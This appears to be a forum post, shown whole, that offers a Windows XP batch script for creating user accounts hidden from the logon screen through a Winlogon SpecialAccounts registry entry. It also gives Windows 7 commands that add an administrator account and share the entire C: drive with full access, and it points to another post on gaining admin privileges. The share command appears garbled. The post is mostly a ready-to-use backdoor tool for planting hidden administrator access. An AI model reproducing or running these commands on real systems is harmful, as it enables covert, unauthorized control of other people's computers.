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Everything posted by 651juan

  1. For xp use: @ECHO off TITLE Admin Account Creator (651juan@cw) COLOR 0f set AC_PART=001 :HEADER echo. ECHO [iNFO] ECHO [-] Create a hidden user acount (U:%AC_NAME%; P:%AC_PASS%; G:%AC_GROUP%; H:%AC_HIDE% ) echo \ GOTO %AC_PART% :001 SET /P AC_NAME=[*] Account name? : cls SET AC_PART=002 GOTO HEADER :002 SET /P AC_PASS=[*] Account password? : cls SET AC_PART=003 GOTO HEADER :003 SET /P AC_COMMENT=[*] Account Comment? : cls SET AC_PART=004 GOTO HEADER :004 ECHO [* The following groups are available on the machine. ECHO. net localgroup | find "*" ECHO. SET /P AC_GROUP=[*] Group? : cls SET AC_PART=005 GOTO HEADER :005 SET /P AC_OK=[*] Creating acount now, Continue? (y/n) : IF NOT %AC_OK%==y GOTO 0051 net user %AC_NAME% %AC_PASS% /add /COMMENT:"%AC_COMMENT%" net localgroup "%AC_GROUP%" %AC_NAME% /add ECHO. pause :0051 cls SET AC_PART=006 GOTO HEADER :006 SET /P AC_HIDE=[*] Do you want to hide the account from the XP logon screen? (y/n) : IF NOT %AC_HIDE%==y GOTO END echo Windows Registry Editor Version 5.00>%TEMP%\addregistry.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%TEMP%\addregistry.reg echo "%AC_NAME%"=dword:00000000>>%TEMP%\addregistry.reg Regedit /s %TEMP%\addregistry.reg Del %TEMP%\addregistry.reg :END ECHO. pause For win 7 use: net user /add useraccountname mypassword net localgroup administrators useraccountname /add net share concfg*C:\/grant:useraccountname,full net user useraccountname * This will create an administrator account called useraccountname with a password of mypassword. The account can be created without a password as well. If you need to delete the account use the same code as mentioned in line 1, but insert 'delete' where 'add' was used. Administrator privileges may be needed.. look for my other post on how to get these.